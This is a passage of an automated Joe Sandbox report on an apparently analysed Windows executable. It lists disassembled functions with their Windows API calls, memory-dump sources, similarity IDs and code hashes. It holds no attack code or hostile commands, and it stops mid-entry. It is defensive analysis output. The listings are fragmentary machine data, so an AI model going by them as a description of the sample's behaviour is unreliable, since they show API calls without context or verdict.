                                                                                                                                                                                                                                                                                                    • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: .lnk
                                                                                                                                                                                                                                                                                                    • API String ID: 3172280962-24824748
                                                                                                                                                                                                                                                                                                    • Opcode ID: c12b49e0756397701905cb5c7e95c90f150eb732f2e7289c783bd70961d5db66
                                                                                                                                                                                                                                                                                                    • Instruction ID: e5ffd252f481e658f32adb7a9cf3a00f1f365743ef6daa171b18721bf32716ee
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c12b49e0756397701905cb5c7e95c90f150eb732f2e7289c783bd70961d5db66
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 81D13271A042019FD714EF24C584A6ABBF5FF89714F14885DF8859B3A1DB31EC45CB92
                                                                                                                                                                                                                                                                                                    Function 00AA86FC Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00AA8740
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000F0,?), ref: 00AA8765
                                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00AA877D
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00AA87A6
                                                                                                                                                                                                                                                                                                    • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00A8C1F2,00000000), ref: 00AA87C6
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A1249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00A124B0
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00AA87B1
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$Long$MetricsSystem
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2294984445-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: a8555e7bc4c76bb8759ad3e592188944cda28fa6fa77451dd7d3382d10fb3d9b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 2a58efc9ce04f53f61597788cdf65347c84bbe468539dbab476c50a058871895
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a8555e7bc4c76bb8759ad3e592188944cda28fa6fa77451dd7d3382d10fb3d9b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F621AF71610242AFCB149F78CC48B6A3BA5EB86325F244A29F967C75F0EF348851CB50
                                                                                                                                                                                                                                                                                                    Function 00A336F2 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00A336E9,00A33355), ref: 00A33700
                                                                                                                                                                                                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00A3370E
                                                                                                                                                                                                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A33727
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00A336E9,00A33355), ref: 00A33779
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 513583bb5409010e1fe0fccb2a975ad62260fc4a728224062c265251ba4dcec7
                                                                                                                                                                                                                                                                                                    • Instruction ID: 4274b0222163809db5d2d88967fe237febce084a10d2396b8b31d86af4f49824
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 513583bb5409010e1fe0fccb2a975ad62260fc4a728224062c265251ba4dcec7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5501D8B755E3116EAE24A7F5BDC667B3B94EB45772F20422AF112850F0EF524D035240
                                                                                                                                                                                                                                                                                                    Function 00A430E7 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000000,00A34D53,00000000,?,?,00A368E2,?,?,00000000), ref: 00A430EB
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A4311E
                                                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00A43146
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00A43153
                                                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 00A4315F
                                                                                                                                                                                                                                                                                                    • _abort.LIBCMT ref: 00A43165
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9a6cb7d3aca55d15e7839058d929b5101d06780ae7d7b4cb241d84e7ccccdff9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 56882e9f871ec201b3759bd973ae4be2451a71cba1e205a74fae76f36874fc75
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9a6cb7d3aca55d15e7839058d929b5101d06780ae7d7b4cb241d84e7ccccdff9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3CF0FC3F94550127CE22B77DAE46B5E276A9FC1770F210629FA25D62D1EF208E034271
                                                                                                                                                                                                                                                                                                    Function 00AA9480 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00A11F87
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11F2D: SelectObject.GDI32(?,00000000), ref: 00A11F96
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11F2D: BeginPath.GDI32(?), ref: 00A11FAD
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A11F2D: SelectObject.GDI32(?,00000000), ref: 00A11FD6
                                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 00AA94AA
                                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,00000003,00000000), ref: 00AA94BE
                                                                                                                                                                                                                                                                                                    • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 00AA94CC
                                                                                                                                                                                                                                                                                                    • LineTo.GDI32(?,00000000,00000003), ref: 00AA94DC
                                                                                                                                                                                                                                                                                                    • EndPath.GDI32(?), ref: 00AA94EC
                                                                                                                                                                                                                                                                                                    • StrokePath.GDI32(?), ref: 00AA94FC
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 43455801-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 33e73f6a59f77a6f0992ed2f60237546835097b2cb73d449368d4cde0d9d0603
                                                                                                                                                                                                                                                                                                    • Instruction ID: 7f01d355bc427f07b661687ab70b1031c5f83f4101d84bdd206de2ec9bbb2c12
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 33e73f6a59f77a6f0992ed2f60237546835097b2cb73d449368d4cde0d9d0603
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B911DB7600014DBFDF129F90EC89E9A7F6DEB09364F048011BA5A5A1A1C7719D56DBA0
                                                                                                                                                                                                                                                                                                    Function 00A75B61 Relevance: 9.0, APIs: 6, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 00A75B7C
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A75B8D
                                                                                                                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A75B94
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00A75B9C
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(000009EC,?,00000000), ref: 00A75BB3
                                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00A75BC5
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 07d56c9dfef74bfdd37eef147ed658fb0add916afadd6a7653a791f73daae169
                                                                                                                                                                                                                                                                                                    • Instruction ID: d31f9dea30b2fc4f9255ef069e2c13ef5e9fd66c501620c680f3a3118259ed9b
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 07d56c9dfef74bfdd37eef147ed658fb0add916afadd6a7653a791f73daae169
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C5014F75E00719BBEB109BF59C49F5EBFB8EB49751F008066FA49A7280E7709C01CBA0
                                                                                                                                                                                                                                                                                                    Function 00A1327E Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A132AF
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000010,00000000), ref: 00A132B7
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A132C2
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A132CD
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000011,00000000), ref: 00A132D5
                                                                                                                                                                                                                                                                                                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 00A132DD
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Virtual
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 4278518827-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 9e4bb1d0c09c7e44696924cdf7b58252755bed4e973a03b0999ed96875d0006b
                                                                                                                                                                                                                                                                                                    • Instruction ID: 96c3733f2b034f0348091d3a996741f4d2a67a6c1b8d8f00346fc30707eb4747
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e4bb1d0c09c7e44696924cdf7b58252755bed4e973a03b0999ed96875d0006b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F1016CB090175A7DE3008F5A8C85B52FFA8FF19354F00411B915C47941C7F5A864CBE5
                                                                                                                                                                                                                                                                                                    Function 00A7F437 Relevance: 9.0, APIs: 6, Instructions: 42windowtimethreadCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A7F447
                                                                                                                                                                                                                                                                                                    • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00A7F45D
                                                                                                                                                                                                                                                                                                    • GetWindowThreadProcessId.USER32(?,?), ref: 00A7F46C
                                                                                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A7F47B
                                                                                                                                                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A7F485
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00A7F48C
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 839392675-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 523b8cec2ceb1c1673cd307a90c643d4b865c09eac9bd3b50b4ed2de5f347093
                                                                                                                                                                                                                                                                                                    • Instruction ID: 07a2c0133dc74dbf5def92b178f228978146f30d03abdec96344d46304bfb7f2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 523b8cec2ceb1c1673cd307a90c643d4b865c09eac9bd3b50b4ed2de5f347093
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0BF03A3224115ABBE7219BA29C0EEEF7B7CEFC7B11F000158F646910D0DBA46A42C6B5
                                                                                                                                                                                                                                                                                                    Function 00A534D6 Relevance: 9.0, APIs: 6, Instructions: 39windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?), ref: 00A534EF
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001328,00000000,?), ref: 00A53506
                                                                                                                                                                                                                                                                                                    • GetWindowDC.USER32(?), ref: 00A53512
                                                                                                                                                                                                                                                                                                    • GetPixel.GDI32(00000000,?,?), ref: 00A53521
                                                                                                                                                                                                                                                                                                    • ReleaseDC.USER32(?,00000000), ref: 00A53533
                                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(00000005), ref: 00A5354D
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ClientColorMessagePixelRectReleaseSendWindow
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 272304278-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7429858c8fc2ff9200c38159bd9087cfccea44d44eefeb5811c64ec4c6a92c5d
                                                                                                                                                                                                                                                                                                    • Instruction ID: 98c966b1c70a5837773f3eac23e2f5babf53211f8d02326966113da7970f3a3d
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7429858c8fc2ff9200c38159bd9087cfccea44d44eefeb5811c64ec4c6a92c5d
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5B014B72540106FFDB509FA4DC08BE97FB5FB45321F500160F96AA25E0DB321E92AF10
                                                                                                                                                                                                                                                                                                    Function 00A721C1 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00A721CC
                                                                                                                                                                                                                                                                                                    • UnloadUserProfile.USERENV(?,?), ref: 00A721D8
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A721E1
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00A721E9
                                                                                                                                                                                                                                                                                                    • GetProcessHeap.KERNEL32(00000000,?), ref: 00A721F2
                                                                                                                                                                                                                                                                                                    • HeapFree.KERNEL32(00000000), ref: 00A721F9
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 146765662-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 2e788357c96c30377b9fb36aab81bd366d7888df44d60cbf739ee5f1cc1855e9
                                                                                                                                                                                                                                                                                                    • Instruction ID: 81ea4d648046156d67483fb23b8fb05ed3c0344b02a03cb29fce3546d9b5d861
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2e788357c96c30377b9fb36aab81bd366d7888df44d60cbf739ee5f1cc1855e9
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BBE0E576104106BBDB019FE1EC0C94AFF39FF4A322B104220F266868B0CB329422DF60
                                                                                                                                                                                                                                                                                                    Function 00A7CE7B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 191windowCOMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00A141EA: _wcslen.LIBCMT ref: 00A141EF
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A7CF99
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00A7CFE0
                                                                                                                                                                                                                                                                                                    • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00A7D047
                                                                                                                                                                                                                                                                                                    • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00A7D075
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000D.00000002.3271065689.0000000000A11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00A10000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271015468.0000000000A10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271313015.0000000000AD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271534818.0000000000ADD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    • Associated: 0000000D.00000002.3271632113.0000000000AE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_13_2_a10000_Inf.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: ItemMenu$Info_wcslen$Default
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    • API String ID: 1227352736-4108050209
                                                                                                                                                                                                                                                                                                    • Opcode ID: c78db241626261ba7e8dca236085ba381177cced7e723dd51e1f6eb257ae7700
                                                                                                                                                                                                                                                                                                    • Instruction ID: b4f53390c4a6e95347d2b145feac26c7b3f449797ff2ed20a28619cc9ae61f80
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c78db241626261ba7e8dca236085ba381177cced7e723dd51e1f6eb257ae7700
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B051CD716043009BD724EF28CD45BABBBF8AF89324F04DA2DF99AD7191DB70C9468752
                                                                                                                                                                                                                                                                                                    Function 00A9B7C4 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                                    Download Yara Rule
